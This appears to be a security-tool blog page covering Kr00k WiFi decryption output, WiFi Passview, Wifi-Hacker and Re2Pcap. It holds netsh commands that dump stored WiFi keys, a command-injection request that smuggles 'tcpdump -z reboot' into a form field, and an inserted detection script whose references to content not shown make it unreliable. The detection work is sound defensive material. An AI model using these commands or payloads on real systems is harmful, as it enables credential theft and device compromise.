/$$ /$$$$$$ /$$$$$$ /$$ /$$
| $$ /$$$_ $$ /$$$_ $$| $$ |__/
| $$ /$$ /$$$$$$ | $$$$\ $$| $$$$\ $$| $$ /$$ /$$ /$$$$$$
| $$ /$$/ /$$__ $$| $$ $$ $$| $$ $$ $$| $$ /$$/| $$ /$$__ $$
| $$$$$$/ | $$ \__/| $$\ $$$$| $$\ $$$$| $$$$$$/ | $$| $$$$$$$$
| $$_ $$ | $$ | $$ \ $$$| $$ \ $$$| $$_ $$ | $$| $$_____/
| $$ \ $$| $$ | $$$$$$/| $$$$$$/| $$ \ $$| $$| $$$$$$$
|__/ \__/|__/ \______/ \______/ |__/ \__/|__/ \_______/
v0.0.1
https://hexway.io/research/r00kie-kr00kie/
[*] Read packets from: encrypted_packets.pcap ....
[*] All packets are read, packet analysis is in progress ....
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 490
id = 756
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0xd0ca
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34789
dport = 1337
seq = 3463744441
ack = 3909086929
dataofs = 8
reserved = 0
flags = PA
window = 1369
chksum = 0x65ee
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1084858, 699843440))]
###[ Raw ]###
load = 'POST /post_form.html HTTP/1.1\r\nHost: sfdsfsdf:1337\r\nConnection: keep-alive\r\nContent-Length: 138240\r\nOrigin: http://sfdsfsdf.ch:1337\r\nUser-Agent: Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nReferer: http://sfdsfsdf.ch:1337/post_form.html\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.9,ru;q=0.8\r\n\r\n'
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 42533
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x2f47
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 34792
dport = 1337
seq = 71773087
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x97df
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1084858, 0)), ('NOP', None), ('WScale', 6)]
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 1460
id = 35150
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x46a6
src = 192.168.43.161
dst = 1.1.1.1
\options \
###[ TCP ]###
sport = 36020
dport = 1337
seq = 395101552
ack = 1111748198
dataofs = 8
reserved = 0
flags = A
window = 1369
chksum = 0x35d2
urgptr = 0
options = [('NOP', None), ('NOP', None), ('Timestamp', (1113058, 700129572))]
###[ Raw ]###
load = "pik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can read this text! I'm so happy!! Now I'm going to follow all these guys: @_chipik, @default_pass, @_hexway !!! Yeah! It's working! I can"
[+] Got a kr00ked packet:
###[ Ethernet ]###
dst = d4:38:9c:82:23:7a
src = 88:c9:d0:fb:88:d1
type = IPv4
###[ IP ]###
version = 4
ihl = 5
tos = 0x0
len = 60
id = 17897
flags = DF
frag = 0
ttl = 64
proto = tcp
chksum = 0x8f83
src = 192.168.43.161
dst = 95.85.25.177
\options \
###[ TCP ]###
sport = 36266
dport = 1337
seq = 3375779416
ack = 0
dataofs = 10
reserved = 0
flags = S
window = 65535
chksum = 0x2c7d
urgptr = 0
options = [('MSS', 1460), ('SAckOK', b''), ('Timestamp', (1117105, 0)), ('NOP', None), ('WScale', 6)]
[+] Found 4 kr00ked packets and decrypted packets saved in: kr00k.pcap</code></pre>
</div>
<br />
<b>Script: <a href="https://github.com/hexway/r00kie-kr00kie/blob/master/traffic_generator.py" rel="nofollow" target="_blank" title="traffic_generator.py">traffic_generator.py</a></b><br />
This script generates <code>UDP</code> traffic from the victim to demonstrate the <code>kr00k</code> attack.<br />
<div>
<pre><code>->~:python3 traffic_generator.py
Sending payload to the UDP port 53 on 8.8.8.8
Press Ctrl+C to exit</code></pre>
</div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/hexway/r00kie-kr00kie" rel="nofollow" target="_blank" title="Download R00Kie-Kr00Kie">Download R00Kie-Kr00Kie</a></span></b></div>
<br />
<span style="font-size: x-large;"><b>WiFi Passview v2.0 - An Open Source Batch Script Based WiFi Passview For Windows!</b></span> (2020-03-03)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-lb6LhYM3luQ/Xl2pB2HZs1I/AAAAAAAAR1Y/FAJMiTtoomI8TrZTnCoCfUonSHsUgyCmQCNcBGAsYHQ/s1600/wifi-passview_8_screenshot.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="532" data-original-width="843" height="402" src="https://1.bp.blogspot.com/-lb6LhYM3luQ/Xl2pB2HZs1I/AAAAAAAAR1Y/FAJMiTtoomI8TrZTnCoCfUonSHsUgyCmQCNcBGAsYHQ/s640/wifi-passview_8_screenshot.jpeg" width="640" /></a></div>
<strong><br /></strong>
<strong>WiFi Passview</strong> is an open-source batch script-based program that can recover your WiFi Password easily in seconds. This is for <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> OS only. Basically, this scripted program has the same function as other passview software such as webpassview and mailpassview.<br />
<em><strong>Disclaimer</strong>: WiFi Passview is <strong>NOT</strong> designed for malicious use! Please use this program responsibly!</em><br />
<span style="font-size: large;"><b>ZSecurity.org</b></span><br />
This project is posted on a cyber security educational <a href="https://www.kitploit.com/search/label/Website" target="_blank" title="website">website</a> called zsecurity.org; visit the project there for more information: <a href="https://zsecurity.org/" rel="nofollow" target="_blank" title="https://zsecurity.org">https://zsecurity.org</a><br />
<br />
<span style="font-size: large;"><b>How it Works</b></span><br />
Essentially, this is a shortcut, packaged as a batch script, for the well-known method of viewing saved WiFi profiles from the command prompt. This is how it works...<br />
<div>
<pre><code>netsh wlan show profiles</code></pre>
</div>
When you use this tool, you are able to extract the WiFi <a href="https://www.kitploit.com/search/label/Passwords" target="_blank" title="passwords">passwords</a> stored on the target machine in just seconds.<br />
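Both WiFi Passview posts on this page describe the same workflow: <code>netsh wlan show profiles</code> run without admin rights, with its output searched by <code>findstr</code> for <code>Key Content</code> (the v3 FAQ above spells this out). The detection logic below is an added defensive example, not WiFi Passview code and not from its author; it also covers the <code>key=clear</code> forms of <code>netsh wlan show profile</code> / <code>netsh wlan export profile</code> that reveal a stored key. The process-creation records are constructed, and their field names follow Sysmon Event ID 1 conventions as an assumption.<br />

```python
"""Process-creation detection for a stored-WLAN-key dump (the WiFi Passview workflow).

Records are constructed and use Sysmon Event ID 1 style field names (an assumption):
ParentProcessId, Image, CommandLine.
"""
import re
from collections import defaultdict

# Ordered: the most specific (and most severe) pattern is tried first.
RULES = [
    ("wlan_key_clear",      # netsh asked to print/export a profile with the key in clear
     re.compile(r"\bnetsh\b.*\bwlan\b.*\b(?:show|export)\s+profiles?\b.*\bkey\s*=\s*clear\b", re.I),
     "high"),
    ("key_content_grep",    # findstr harvesting the "Key Content" line, as the FAQ describes
     re.compile(r"\bfindstr\b.*key\s+content", re.I),
     "medium"),
    ("wlan_profile_enum",   # plain enumeration needs no admin rights and is common admin activity
     re.compile(r"\bnetsh\b.*\bwlan\b.*\bshow\s+profiles?\b", re.I),
     "low"),
]


def classify(cmdline):
    """Return (rule_name, severity) for one process command line, or (None, None)."""
    for name, rx, severity in RULES:
        if rx.search(cmdline):
            return name, severity
    return None, None


def detect(events):
    """Return findings as (severity, reason, parent_pid) tuples.

    A cleartext-key request is flagged on its own. Profile enumeration is flagged only when
    the same parent process also ran findstr for "Key Content": enumeration alone is benign,
    the pair is the credential-dump workflow.
    """
    findings = []
    seen_by_parent = defaultdict(set)
    for ev in events:
        name, severity = classify(ev["CommandLine"])
        if name is None:
            continue
        seen_by_parent[ev["ParentProcessId"]].add(name)
        if severity == "high":
            findings.append(("high", "cleartext WLAN key requested: " + ev["CommandLine"],
                             ev["ParentProcessId"]))
    for pid, names in seen_by_parent.items():
        if "key_content_grep" in names and "wlan_profile_enum" in names:
            findings.append(("high",
                             "netsh wlan profile enumeration and findstr 'Key Content' under one parent",
                             pid))
    return findings


# Constructed sample telemetry (not real logs); ParentProcessId groups one cmd.exe session.
SAMPLE_EVENTS = [
    {"ParentProcessId": 100, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh wlan show profiles"},
    {"ParentProcessId": 100, "Image": r"C:\Windows\System32\findstr.exe",
     "CommandLine": 'findstr "Key Content"'},
    {"ParentProcessId": 200, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": 'netsh wlan show profile name="HomeNet" key=clear'},
    {"ParentProcessId": 300, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh interface ip show config"},          # unrelated netsh use
    {"ParentProcessId": 400, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": "netsh wlan show profiles"},                # enumeration alone: no finding
    {"ParentProcessId": 500, "Image": r"C:\Windows\System32\netsh.exe",
     "CommandLine": r"netsh wlan export profile folder=C:\tmp key=clear"},
]

if __name__ == "__main__":
    for severity, reason, pid in detect(SAMPLE_EVENTS):
        print(f"[{severity}] parent {pid}: {reason}")
```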
<br />
<span style="font-size: large;"><b>Features</b></span><br />
This simple tool offers you the following features...<br />
<ul>
<li>Extract all available WiFi passwords stored on the target machine in just seconds.</li>
<li>Extract password from specific target SSID.</li>
<li>Save extracted passwords.</li>
<li>Additional options.</li>
<li>No manual reading of <strong><code>Key Content</code></strong>, the tool will do that for you!</li>
<li>Standalone batch program.</li>
<li>Customizable.</li>
</ul>
<br />
<span style="font-size: large;"><b>Usage</b></span><br />
Download the repository, look for the <strong><code>"wifi-passview-vX.X.X.bat"</code></strong> file, open it and run it as administrator. All you have to do is follow the on-screen instructions.<br />
Wanna use for WiFi Hacking? Visit this <strong>blog</strong>...<br />
<br />
<span style="font-size: large;"><b>In Action</b></span><br />
Here's how this tool works...<br />
<br />
<div style="text-align: center;"><iframe width="560" height="315" src="https://www.youtube.com/embed/dYWuXBjMyVc" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe></div>
<br />
Don't forget to like, share, and subscribe to my channel!<br />
<br />
<span style="font-size: large;"><b>White Label / Personalize / Custom</b></span><br />
<ul>
<li>Download the repository</li>
<li>Do <strong><code>"npm install"</code></strong> and <strong><code>"npm install gulp-cli -g && npm install gulp -D"</code></strong></li>
<li>After that, edit the <strong><code>"./src/config.json"</code></strong> file for your customization or personalization.</li>
<li>When you are satisfied, just do <strong><code>"gulp build"</code></strong> or <strong><code>"gulp"</code></strong> to initiate the building process.</li>
<li>If you want to reset the building process just do <strong><code>"gulp cleandev"</code></strong>.</li>
</ul>
<br />
<span style="font-size: large;"><b>Contributing</b></span><br />
Contributions are welcome, create a pull request to this repo and I will review your code.<br />
<br />
<span style="font-size: large;"><b>Issues</b></span><br />
If you're facing a problem using WiFi Passview, please let me know by creating an issue in this GitHub repository. I'm happy to help you! Don't forget to provide some <a href="https://www.kitploit.com/search/label/Screenshot" target="_blank" title="screenshot">screenshots</a> or error logs of it!<br />
<br />
<span style="font-size: large;"><b>To Do</b></span><br />
<ul>
<li>Gulp Options</li>
<li>CI (Travis)</li>
<li>More... (have suggestions? let me know!)</li>
</ul>
<br />
<span style="font-size: large;"><b>Author</b></span><br />
This project is created by <strong>Waren Gonzaga</strong> for educational purposes.<br />
<ul>
<li><strong>Facebook:</strong> <a href="https://facebook.com/warengonzagaofficialpage" rel="nofollow" target="_blank" title="https://facebook.com/warengonzagaofficialpage">https://facebook.com/warengonzagaofficialpage</a></li>
<li><strong>Twitter:</strong> <a href="https://twitter.com/warengonzaga" rel="nofollow" target="_blank" title="https://twitter.com/warengonzaga">https://twitter.com/warengonzaga</a></li>
<li><strong>Website:</strong> <a href="https://warengonzaga.com/" rel="nofollow" target="_blank" title="https://warengonzaga.com">https://warengonzaga.com</a></li>
<li><strong>Email:</strong> dev(at)warengonzaga[.]com</li>
</ul>
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/WarenGonzaga/wifi-passview" rel="nofollow" target="_blank" title="Download Wifi-Passview">Download Wifi-Passview</a></span></b></div>
<br />
<span style="font-size: x-large;"><b>Wifi-Hacker - Shell Script For Attacking Wireless Connections Using Built-In Kali Tools</b></span> (2020-02-26)<br />
Shell script for attacking <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="Wireless">wireless</a> connections using built-in <a href="https://www.kitploit.com/search/label/Kali" target="_blank" title="Kali">Kali</a> tools. Supports all security types (WEP, WPS, WPA, WPA2).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-BtLWlh-Rcjc/XlRjzXhrMkI/AAAAAAAARvw/0r9GQsQvb4IHkxHvZzI6zOjm9qsesNHFwCNcBGAsYHQ/s1600/wifi-hacker_1.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-BtLWlh-Rcjc/XlRjzXhrMkI/AAAAAAAARvw/0r9GQsQvb4IHkxHvZzI6zOjm9qsesNHFwCNcBGAsYHQ/s640/wifi-hacker_1.jpeg" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-kgRH3JaJtjk/XlRj1y13oJI/AAAAAAAARwI/T1CNOMVTC-sqUILpyTgzfmA1-RD-BgsFQCNcBGAsYHQ/s1600/wifi-hacker_2.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-kgRH3JaJtjk/XlRj1y13oJI/AAAAAAAARwI/T1CNOMVTC-sqUILpyTgzfmA1-RD-BgsFQCNcBGAsYHQ/s640/wifi-hacker_2.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-c1AH1lkAH-E/XlRj3Kcv8qI/AAAAAAAARwU/soTd-ADpzL8qWXEiCX-qMUUKVXtFgYMXwCNcBGAsYHQ/s1600/wifi-hacker_3.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-c1AH1lkAH-E/XlRj3Kcv8qI/AAAAAAAARwU/soTd-ADpzL8qWXEiCX-qMUUKVXtFgYMXwCNcBGAsYHQ/s640/wifi-hacker_3.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-jU48cvvGX1M/XlRj2w1TMOI/AAAAAAAARwM/Nuui9fM-4Pw_neifsGXOjXjZzQq2-DHkQCNcBGAsYHQ/s1600/wifi-hacker_4.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-jU48cvvGX1M/XlRj2w1TMOI/AAAAAAAARwM/Nuui9fM-4Pw_neifsGXOjXjZzQq2-DHkQCNcBGAsYHQ/s640/wifi-hacker_4.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-nNGdm8niHaM/XlRj22trZFI/AAAAAAAARwQ/TOoTp8Of_VM-p_4m7D6J-PHzjOIIsCC4ACNcBGAsYHQ/s1600/wifi-hacker_5.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-nNGdm8niHaM/XlRj22trZFI/AAAAAAAARwQ/TOoTp8Of_VM-p_4m7D6J-PHzjOIIsCC4ACNcBGAsYHQ/s640/wifi-hacker_5.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-iz9AgmF1CCk/XlRj37opT4I/AAAAAAAARwY/2eOwAPrKt10d1CjGI5oOmZ0cpsKr1ZGTgCNcBGAsYHQ/s1600/wifi-hacker_6.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-iz9AgmF1CCk/XlRj37opT4I/AAAAAAAARwY/2eOwAPrKt10d1CjGI5oOmZ0cpsKr1ZGTgCNcBGAsYHQ/s640/wifi-hacker_6.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-gcNpd4pVy74/XlRj4ekFGdI/AAAAAAAARwc/7mG2-BaX4LsQU6ytZr9kAxgxY2b9H1JagCNcBGAsYHQ/s1600/wifi-hacker_7.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-gcNpd4pVy74/XlRj4ekFGdI/AAAAAAAARwc/7mG2-BaX4LsQU6ytZr9kAxgxY2b9H1JagCNcBGAsYHQ/s640/wifi-hacker_7.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-rLXbDBkOwaA/XlRj4ZAcOdI/AAAAAAAARwg/NA1UwwcW5WYf9u2m5MY1qh6V8yu6_gFJACNcBGAsYHQ/s1600/wifi-hacker_8.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-rLXbDBkOwaA/XlRj4ZAcOdI/AAAAAAAARwg/NA1UwwcW5WYf9u2m5MY1qh6V8yu6_gFJACNcBGAsYHQ/s640/wifi-hacker_8.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-VIXfCbdcYKs/XlRj49OYn0I/AAAAAAAARwk/Pyw7kuxPDFoSCJC2UAe8M3y_idCb2grBACNcBGAsYHQ/s1600/wifi-hacker_9.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-VIXfCbdcYKs/XlRj49OYn0I/AAAAAAAARwk/Pyw7kuxPDFoSCJC2UAe8M3y_idCb2grBACNcBGAsYHQ/s640/wifi-hacker_9.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-2XaO7UetD5c/XlRjzYaidkI/AAAAAAAARvs/KEEbD98LrJQ_6QzPrP1wLWgeRbZAvlzNgCNcBGAsYHQ/s1600/wifi-hacker_10.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-2XaO7UetD5c/XlRjzYaidkI/AAAAAAAARvs/KEEbD98LrJQ_6QzPrP1wLWgeRbZAvlzNgCNcBGAsYHQ/s640/wifi-hacker_10.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Odnl-J-UUjE/XlRjzR0iERI/AAAAAAAARv0/M9Y_bfm3ilQSC7HrMKri0SwCLXP-_ABzACNcBGAsYHQ/s1600/wifi-hacker_11.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-Odnl-J-UUjE/XlRjzR0iERI/AAAAAAAARv0/M9Y_bfm3ilQSC7HrMKri0SwCLXP-_ABzACNcBGAsYHQ/s640/wifi-hacker_11.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Iw8qk9y5DiQ/XlRj0m6286I/AAAAAAAARv4/remWsUFV82IVuIASxjorq04GCyxL5ufzQCNcBGAsYHQ/s1600/wifi-hacker_12.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-Iw8qk9y5DiQ/XlRj0m6286I/AAAAAAAARv4/remWsUFV82IVuIASxjorq04GCyxL5ufzQCNcBGAsYHQ/s640/wifi-hacker_12.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-280HM98BfGk/XlRj0iEOjAI/AAAAAAAARv8/KphStxEhz-UnfThZWC88unmnFwkQyiu4QCNcBGAsYHQ/s1600/wifi-hacker_13.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-280HM98BfGk/XlRj0iEOjAI/AAAAAAAARv8/KphStxEhz-UnfThZWC88unmnFwkQyiu4QCNcBGAsYHQ/s640/wifi-hacker_13.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-0livR3QhN8o/XlRj1rMToiI/AAAAAAAARwA/_PEHQyQUZmgzczctGNjR26LnTIDBfTCigCNcBGAsYHQ/s1600/wifi-hacker_14.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-0livR3QhN8o/XlRj1rMToiI/AAAAAAAARwA/_PEHQyQUZmgzczctGNjR26LnTIDBfTCigCNcBGAsYHQ/s640/wifi-hacker_14.jpeg" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-iXilup8PMvs/XlRj1tjmAVI/AAAAAAAARwE/-Mc9XsCzgyg2PA42tX1WE5h6P8WnTDUvgCNcBGAsYHQ/s1600/wifi-hacker_15.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1366" height="358" src="https://1.bp.blogspot.com/-iXilup8PMvs/XlRj1tjmAVI/AAAAAAAARwE/-Mc9XsCzgyg2PA42tX1WE5h6P8WnTDUvgCNcBGAsYHQ/s640/wifi-hacker_15.jpeg" width="640" /></a></div>
<br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/esc0rtd3w/wifi-hacker" rel="nofollow" target="_blank" title="Download Wifi-Hacker">Download Wifi-Hacker</a></span></b></div>
<br />
<span style="font-size: x-large;"><b>Re2Pcap - Create PCAP file from raw HTTP request or response in seconds</b></span> (2020-02-07)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-W0AHKaLFegw/Xjoq9_9lhjI/AAAAAAAARnM/Kmi9daKc5GAASo8mB2I4MnQ5TorcKdI_gCNcBGAsYHQ/s1600/Re2Pcap_3_re2pcap.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="213" data-original-width="1000" height="136" src="https://1.bp.blogspot.com/-W0AHKaLFegw/Xjoq9_9lhjI/AAAAAAAARnM/Kmi9daKc5GAASo8mB2I4MnQ5TorcKdI_gCNcBGAsYHQ/s640/Re2Pcap_3_re2pcap.png" width="640" /></a></div>
<br />
Re2Pcap is an abbreviation of Request2Pcap and Response2Pcap. Community users can quickly create PCAP files using Re2Pcap and test them against <a href="https://snort.org/" rel="nofollow" target="_blank" title="Snort">Snort</a> rules.<br />
Re2Pcap allows you to quickly create a PCAP file for a raw HTTP request such as the one shown below<br />
<pre><code>POST /admin/tools/iplogging.cgi HTTP/1.1
Host: 192.168.13.31:80
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/plain, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.13.31:80/admin/tools/iplogging.html
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 63
Cookie: token=1e9c07e135a15e40b3290c320245ca9a
Connection: close
tcpdumpParams=tcpdump -z reboot -G 2 -i eth0&stateRequest=start</code></pre>
<span style="font-size: large;"><b>Usage</b></span><br />
<pre><code>git clone https://github.com/Cisco-Talos/Re2Pcap.git
cd Re2Pcap/
docker build -t re2pcap .
docker run --rm --cap-add NET_ADMIN -p 5000:5000 re2pcap</code></pre>
OR<br />
<pre><code>docker run --rm --cap-add NET_ADMIN -p 5000:5000 --name re2pcap amitraut/re2pcap</code></pre>
Open <code>localhost:5000</code> in your web browser to access Re2Pcap, or use the <a href="https://github.com/Cisco-Talos/Re2Pcap/blob/master/Re2Pcap-cmd" rel="nofollow" target="_blank" title="Re2Pcap-cmd">Re2Pcap-cmd</a> script to interact with the Re2Pcap <a href="https://www.kitploit.com/search/label/Container" target="_blank" title="container">container</a> and get the PCAP in the current working directory<br />
<br />
<span style="font-size: large;"><b>Requirements</b></span><br />
<ul>
<li>Docker</li>
<li>HTTP Raw Request / Response</li>
<li>Web Browser (for best results, please use <strong><em>Chromium</em></strong> based web browsers)</li>
</ul>
<br />
<span style="font-size: large;"><b>Advantages</b></span><br />
<ul>
<li>Easy setup. No complex multi-VM setup required</li>
<li>Re2Pcap runs on Alpine Linux based docker image that weighs less than 100 MB :D</li>
<li>Allows you to dump a simulated raw HTTP request and response into a PCAP</li>
</ul>
<br />
<span style="font-size: large;"><b>Dockerfile</b></span><br />
<pre><code>FROM alpine
# Get required dependencies and setup for Re2Pcap
RUN echo "http://dl-cdn.alpinelinux.org/alpine/edge/testing" >> /etc/apk/repositories
RUN apk update && apk add python3 tcpdump tcpreplay
RUN pip3 install --upgrade pip
RUN pip3 install pexpect flask requests httpretty requests-toolbelt
COPY Re2Pcap/ /Re2Pcap
RUN cd Re2Pcap && chmod +x Re2Pcap.py
WORKDIR /Re2Pcap
EXPOSE 5000/tcp
# Run application at start of new container
CMD ["/usr/bin/python3", "Re2Pcap.py"]</code></pre>
<br />
<span style="font-size: large;"><b>Walkthrough</b></span><br />
<ul>
<li>Video walkthrough shows pcap creation for Sierra <a href="https://www.kitploit.com/search/label/Wireless" target="_blank" title="Wireless">Wireless</a> AirLink ES450 ACEManager iplogging.cgi <a href="https://www.talosintelligence.com/reports/TALOS-2018-0746" rel="nofollow" target="_blank" title="command ">command </a><a href="https://www.kitploit.com/search/label/Injection" target="_blank" title="injection">injection</a> vulnerability using Re2Pcap web interface</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-S7cPKgomrVU/XjorIAva53I/AAAAAAAARnQ/QCDfjDdLN7Q6lB-Z_0McnwevSjNwBe8CwCNcBGAsYHQ/s1600/Re2Pcap_4_Re2Pcap_Demo.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="718" data-original-width="1265" height="362" src="https://1.bp.blogspot.com/-S7cPKgomrVU/XjorIAva53I/AAAAAAAARnQ/QCDfjDdLN7Q6lB-Z_0McnwevSjNwBe8CwCNcBGAsYHQ/s640/Re2Pcap_4_Re2Pcap_Demo.gif" width="640" /></a></div>
<br />
<ul>
<li>Video walkthrough of PCAP creation for Sierra Wireless AirLink ES450 ACEManager iplogging.cgi <a href="https://www.talosintelligence.com/reports/TALOS-2018-0746" rel="nofollow" target="_blank" title="command injection vulnerability">command injection vulnerability</a> using Re2Pcap-cmd script</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-Nv35pNRdS9E/XjorOCUCeSI/AAAAAAAARnU/TSNAr3yN1uozRGMw0ebz6uTmrKIhNNJiwCNcBGAsYHQ/s1600/Re2Pcap_5_Re2Pcap_Demo1.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="712" data-original-width="1265" height="360" src="https://1.bp.blogspot.com/-Nv35pNRdS9E/XjorOCUCeSI/AAAAAAAARnU/TSNAr3yN1uozRGMw0ebz6uTmrKIhNNJiwCNcBGAsYHQ/s640/Re2Pcap_5_Re2Pcap_Demo1.gif" width="640" /></a></div>
